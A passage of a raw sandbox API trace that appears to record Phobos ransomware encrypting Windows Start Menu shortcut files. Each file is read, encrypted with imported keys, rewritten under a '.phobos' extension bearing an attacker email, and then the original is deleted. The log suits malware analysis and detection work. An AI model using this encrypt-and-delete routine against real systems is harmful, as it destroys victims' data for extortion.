CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0176.759] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.759] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0176.759] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.759] CloseHandle (hObject=0x14c) returned 1 [0176.759] CloseHandle (hObject=0x188) returned 1 [0176.759] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk")) returned 1 [0176.761] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.761] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.761] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1386) returned 1 [0176.761] CloseHandle (hObject=0x188) returned 1 [0176.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk")) returned 0x20 [0176.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.761] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.761] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.761] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.761] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.762] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.762] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x56a, lpOverlapped=0x0) returned 1 [0176.767] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x570, dwBufLen=0x570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x570) returned 1 [0176.767] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x570, lpOverlapped=0x0) returned 1 [0176.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.768] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.768] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0176.768] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.768] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0176.768] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.768] CloseHandle (hObject=0x188) returned 1 [0176.768] CloseHandle (hObject=0x14c) returned 1 [0176.768] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\TabTip.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\tabtip.lnk")) returned 1 [0176.769] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.769] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.770] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1316) returned 1 [0176.770] CloseHandle (hObject=0x14c) returned 1 [0176.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk")) returned 0x20 [0176.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.770] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.770] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.770] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.770] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.770] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x524, lpOverlapped=0x0) returned 1 [0176.774] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x530, dwBufLen=0x530 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x530) returned 1 [0176.774] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x530, lpOverlapped=0x0) returned 1 [0176.775] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.775] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.775] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.775] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.775] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.775] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.775] CloseHandle (hObject=0x14c) returned 1 [0176.775] CloseHandle (hObject=0x188) returned 1 [0176.775] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\Windows Journal.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\tablet pc\\windows journal.lnk")) returned 1 [0176.777] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.777] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1579) returned 1 [0176.777] CloseHandle (hObject=0x188) returned 1 [0176.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk")) returned 0x20 [0176.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.777] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.777] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.778] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.778] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x62b, lpOverlapped=0x0) returned 1 [0176.779] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x630, dwBufLen=0x630 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x630) returned 1 [0176.779] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x630, lpOverlapped=0x0) returned 1 [0176.780] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.780] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.780] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.780] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.780] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.780] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.780] CloseHandle (hObject=0x188) returned 1 [0176.780] CloseHandle (hObject=0x14c) returned 1 [0176.780] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Welcome Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\welcome center.lnk")) returned 1 [0176.791] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.792] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1989) returned 1 [0176.792] CloseHandle (hObject=0x14c) returned 1 [0176.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk")) returned 0x20 [0176.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.792] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.792] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.792] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.792] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.792] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7c5, lpOverlapped=0x0) returned 1 [0176.821] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7d0, dwBufLen=0x7d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7d0) returned 1 [0176.821] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7d0, lpOverlapped=0x0) returned 1 [0176.822] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0176.822] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.822] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0176.822] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.822] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0176.822] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.822] CloseHandle (hObject=0x14c) returned 1 [0176.822] CloseHandle (hObject=0x188) returned 1 [0176.822] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell (x86).lnk")) returned 1 [0176.824] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.824] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.825] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1468) returned 1 [0176.825] CloseHandle (hObject=0x188) returned 1 [0176.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk")) returned 0x20 [0176.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.825] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.825] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.826] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.826] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5bc, lpOverlapped=0x0) returned 1 [0176.838] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5c0) returned 1 [0176.838] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5c0, lpOverlapped=0x0) returned 1 [0176.839] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0176.839] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.839] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0176.839] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.839] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0176.839] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.839] CloseHandle (hObject=0x188) returned 1 [0176.839] CloseHandle (hObject=0x14c) returned 1 [0176.839] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell ISE (x86).lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell ise (x86).lnk")) returned 1 [0176.840] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 